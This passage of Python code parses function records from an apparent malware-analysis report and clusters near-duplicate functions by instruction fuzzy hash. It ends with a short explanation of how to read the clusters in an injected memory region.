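            parts = [p.strip() for p in value.split(",")]
            cur.source_file = parts[0]
            cur.offset = next((p.split(":", 1)[1].strip()
                               for p in parts if p.startswith("Offset:")), "")
        elif key == "API ID":
            cur.api_ids = [s for s in value.split("$") if s]
        elif key == "String ID":
            cur.string_ids = [s for s in value.split("$") if s]
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Opcode Fuzzy Hash":
            cur.opcode_fuzzy_hash = value
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = value.upper()
    return records


def nibble_similarity(a, b):
    """Fraction of hex digits equal at the same position (example's own metric,
    only meaningful for equal-length Instruction Fuzzy Hashes)."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


def cluster_by_fuzzy_hash(records, threshold=0.7):
    """Greedy single-linkage: a record joins the first cluster containing a
    member whose Instruction Fuzzy Hash is at least `threshold` similar."""
    clusters = []
    for r in records:
        for c in clusters:
            if any(nibble_similarity(r.instruction_fuzzy_hash,
                                     o.instruction_fuzzy_hash) >= threshold for o in c):
                c.append(r)
                break
        else:
            clusters.append([r])
    return clusters


def group_by_dump(records):
    """Number of function records per memory-dump offset."""
    counts = defaultdict(int)
    for r in records:
        counts[r.offset] += 1
    return dict(counts)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print("functions per dump:", group_by_dump(recs))
    for i, c in enumerate(cluster_by_fuzzy_hash(recs)):
        print(f"cluster {i}: {[r.instruction_fuzzy_hash[:16] for r in c]}")
```

Run against the full report text (all records of the 0x06700000 dump cluster together under the 0.7 threshold) to see which functions are near-duplicates of each other; a cluster of many almost-identical functions in one injected region is the kind of pattern worth a closer look in the disassembly, while the `Opcode ID` / `Opcode Fuzzy Hash` pair can be checked for equality as a quick sanity test on the parse.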